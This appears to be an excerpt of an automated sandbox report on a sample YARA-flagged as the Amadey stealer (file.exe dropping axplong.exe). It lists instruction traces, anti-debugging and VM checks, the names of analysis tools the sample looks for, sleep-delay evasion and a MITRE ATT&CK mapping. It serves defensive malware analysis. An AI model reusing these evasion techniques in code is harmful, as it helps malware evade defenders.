                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0B3C second address: 4DD0BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F865CD192DAh 0x0000000a sbb ch, FFFFFFE8h 0x0000000d jmp 00007F865CD192DBh 0x00000012 popfd 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007F865CD192E8h 0x0000001a jmp 00007F865CD192E5h 0x0000001f popfd 0x00000020 popad 0x00000021 pop esi 0x00000022 jmp 00007F865CD192DEh 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F865CD192E7h 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0BB4 second address: 4DD0BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0BD9 second address: 4DD0BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0BDD second address: 4DD0BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0BF0 second address: 4DD0BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0DEC second address: 4DE0E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C5551h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0E01 second address: 4DE0E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0E11 second address: 4DE0E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0E15 second address: 4DE0E1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0E1B second address: 4DE0E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865D1C5557h 0x00000009 jmp 00007F865D1C5553h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F865D1C5550h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0B57 second address: 4DE0B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0CC52604h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F865CD192E9h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F865CD192DDh 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0B8F second address: 4DE0B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0B9F second address: 4DE0BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E606EF second address: 4E606F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E606F5 second address: 4E6076D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F865CD192E9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F865CD192DEh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F865CD192DDh 0x00000022 sbb cl, FFFFFF86h 0x00000025 jmp 00007F865CD192E1h 0x0000002a popfd 0x0000002b call 00007F865CD192E0h 0x00000030 pop eax 0x00000031 popad 0x00000032 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50A63 second address: 4E50A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C5557h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E508F6 second address: 4E508FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF01A2 second address: 4DF01B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF01B1 second address: 4DF01C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192E4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF01C9 second address: 4DF01FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a call 00007F865D1C554Ah 0x0000000f mov edi, ecx 0x00000011 pop ecx 0x00000012 mov al, bl 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F865D1C5555h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF01FD second address: 4DF020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50C7D second address: 4E50C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50C83 second address: 4E50C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50C87 second address: 4E50C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov dx, 6E6Ah 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50C9A second address: 4E50D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865CD192DEh 0x00000009 adc al, 00000028h 0x0000000c jmp 00007F865CD192DBh 0x00000011 popfd 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F865CD192E1h 0x00000022 adc esi, 0A301346h 0x00000028 jmp 00007F865CD192E1h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F865CD192E0h 0x00000034 xor cx, 8FE8h 0x00000039 jmp 00007F865CD192DBh 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F865CD192E6h 0x00000047 push dword ptr [ebp+0Ch] 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50D33 second address: 4E50D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50D50 second address: 4E50DB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 mov dx, 051Ch 0x00000014 popad 0x00000015 call 00007F865CD192D9h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movzx ecx, bx 0x00000020 pushfd 0x00000021 jmp 00007F865CD192E9h 0x00000026 sub esi, 7966F226h 0x0000002c jmp 00007F865CD192E1h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50DB3 second address: 4E50DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50DB9 second address: 4E50DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F865CD192E6h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F865CD192DEh 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50DEC second address: 4E50E2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop esi 0x0000000f pushfd 0x00000010 jmp 00007F865D1C5551h 0x00000015 add eax, 2AAA1E46h 0x0000001b jmp 00007F865D1C5551h 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50E2E second address: 4E50E41 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 29D0h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50E41 second address: 4E50E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50E45 second address: 4E50E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E005A8 second address: 4E005B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E005B8 second address: 4E005E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F865CD192E7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, edi 0x00000015 mov si, bx 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E005E3 second address: 4E005F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Fh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E005F6 second address: 4E0062D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007F865CD192E5h 0x0000000f call 00007F865CD192D9h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F865CD192DDh 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0062D second address: 4E00760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F865D1C5557h 0x00000011 sub si, 4A5Eh 0x00000016 jmp 00007F865D1C5559h 0x0000001b popfd 0x0000001c jmp 00007F865D1C5550h 0x00000021 popad 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F865D1C5551h 0x0000002d or cx, 5346h 0x00000032 jmp 00007F865D1C5551h 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F865D1C5550h 0x0000003e or ch, FFFFFFE8h 0x00000041 jmp 00007F865D1C554Bh 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [eax] 0x0000004a jmp 00007F865D1C5559h 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 pushad 0x00000054 call 00007F865D1C5557h 0x00000059 pushad 0x0000005a popad 0x0000005b pop esi 0x0000005c pushfd 0x0000005d jmp 00007F865D1C554Fh 0x00000062 or esi, 1209453Eh 0x00000068 jmp 00007F865D1C5559h 0x0000006d popfd 0x0000006e popad 0x0000006f pop eax 0x00000070 jmp 00007F865D1C554Eh 0x00000075 push 670FAF65h 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E00760 second address: 4E00764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E00764 second address: 4E0076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0076A second address: 4E007D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865CD192DBh 0x00000009 add si, 5FFEh 0x0000000e jmp 00007F865CD192E9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F865CD192E0h 0x0000001a add ah, FFFFFFF8h 0x0000001d jmp 00007F865CD192DBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 add dword ptr [esp], 1066FE9Bh 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F865CD192E0h 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E007D6 second address: 4E007E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Tries to evade debugger and weak emulator (self modifying code)
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 42EAED instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 42C0E2 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5EEEC0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 66D4EA instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 7FEAED instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 7FC0E2 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 9BEEC0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: A3D4EA instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E502E5 rdtsc 0_2_04E502E5
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 407Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 6714Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6932Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6932Thread sleep time: -74037s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2860Thread sleep count: 278 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2860Thread sleep time: -556278s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5484Thread sleep count: 407 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5484Thread sleep time: -12210000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6312Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6936Thread sleep count: 46 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6936Thread sleep time: -92046s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2908Thread sleep count: 6714 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2908Thread sleep time: -13434714s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.2605243731.0000000000E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: file.exe, 00000000.00000002.1399245952.00000000005BC000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1425381279.000000000098C000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E502E5 rdtsc 0_2_04E502E5
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007C645B mov eax, dword ptr fs:[00000030h]4_2_007C645B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007CA1C2 mov eax, dword ptr fs:[00000030h]4_2_007CA1C2
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: HFQProgram Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007AD312 cpuid 4_2_007AD312
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007ACB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,4_2_007ACB1A
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007965B0 LookupAccountNameA,4_2_007965B0

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Amadeys stealer DLL
                  Source: Yara matchFile source: 2.2.axplong.exe.790000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.axplong.exe.790000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000003.1862874279.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1358005555.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1424184795.0000000000791000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1398782734.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.1383917764.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		251
                  Virtualization/Sandbox Evasion                  		LSASS Memory741
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		12
                  Process Injection                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information                  		NTDS251
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture12
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Account Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Owner/User Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
